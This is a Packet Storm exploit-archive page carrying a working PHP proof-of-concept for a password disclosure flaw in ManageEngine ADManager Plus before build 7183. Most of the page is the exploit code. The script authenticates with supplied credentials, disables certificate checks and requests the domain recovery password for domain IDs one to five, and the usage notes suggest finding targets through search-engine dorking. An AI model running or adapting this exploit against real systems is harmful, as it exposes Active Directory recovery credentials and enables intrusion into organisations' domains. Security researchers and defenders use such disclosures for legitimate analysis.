exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ManageEngine ADManager 7183 Password Hash Disclosure

ManageEngine ADManager 7183 Password Hash Disclosure
Posted Oct 4, 2024
Authored by indoushka

ManageEngine ADManager version 7183 suffers from a password hash disclosure vulnerability.

tags | exploit, info disclosure
SHA-256 | ddade0c8d44290aca9a54f0c1621504614026325fdfa745fc4d9c008c6feca03

ManageEngine ADManager 7183 Password Hash Disclosure

Change Mirror Download
=============================================================================================================================================
| # Title : ManageEngine ADManager 7183 Password Hash Disclosure Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |
| # Vendor : https://www.manageengine.com/products/ad-manager/ |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] ManageEngine ADManager Plus versions prior to build 7183 suffers from a Password Hash disclosure vulnerability..

[+] save code as poc.php .

[+] USage : php poc.php -t <target_url> -a <auth> -u <username> -p <password>

[+] PayLoad :

<?php

// تعطيل تحذيرات HTTPS
error_reporting(0);

function getPass($target, $auth, $user, $password) {
// تهيئة Session
$ch = curl_init();

// تحويل نوع المصادقة إذا كان ADManager
if (strtolower($auth) == 'admanager') {
$auth = 'ADManager Plus Authentication';
}

// بيانات تسجيل الدخول
$data = http_build_query([
"is_admp_pass_encrypted" => "false",
"j_username" => $user,
"j_password" => $password,
"domainName" => $auth,
"AUTHRULE_NAME" => "ADAuthenticator"
]);

// إعدادات الطلب
$url = $target . 'j_security_check?LogoutFromSSO=true';
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_HTTPHEADER, [
"User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0",
"Content-Type: application/x-www-form-urlencoded"
]);

// إرسال الطلب
$response = curl_exec($ch);

// التحقق من المصادقة
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
if (strpos($response, 'Cookie') !== false) {
echo "[+] Authentication successful!\n";
} elseif ($http_code == 200) {
echo "[-] Invalid login name/password!\n";
exit(0);
} else {
echo "[-] Something went wrong!\n";
exit(1);
}

// استرجاع كلمة المرور
for ($i = 1; $i <= 5; $i++) {
echo "[*] Trying to fetch recovery password for domainId: $i!\n";
$passUrl = $target . 'ConfigureRecoverySettings/GET_PASS?req=%7B%22domainId%22%3A%22' . $i . '%22%7D';
curl_setopt($ch, CURLOPT_URL, $passUrl);
curl_setopt($ch, CURLOPT_POST, false);
$passResponse = curl_exec($ch);

if ($passResponse) {
echo $passResponse . "\n";
}
}

curl_close($ch);
}

function get_args() {
global $argv;

$args = [
'target' => '',
'auth' => '',
'user' => '',
'password' => ''
];

for ($i = 1; $i < count($argv); $i++) {
switch ($argv[$i]) {
case '-t':
case '--target':
$args['target'] = $argv[++$i];
break;
case '-a':
case '--auth':
$args['auth'] = $argv[++$i];
break;
case '-u':
case '--user':
$args['user'] = $argv[++$i];
break;
case '-p':
case '--password':
$args['password'] = $argv[++$i];
break;
}
}

return $args;
}

function main() {
$args = get_args();
if (!$args['target'] || !$args['auth'] || !$args['user'] || !$args['password']) {
echo "Usage: php exploit.php -t <target_url> -a <auth> -u <username> -p <password>\n";
exit(1);
}

getPass($args['target'], $args['auth'], $args['user'], $args['password']);
}

main();

?>



Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close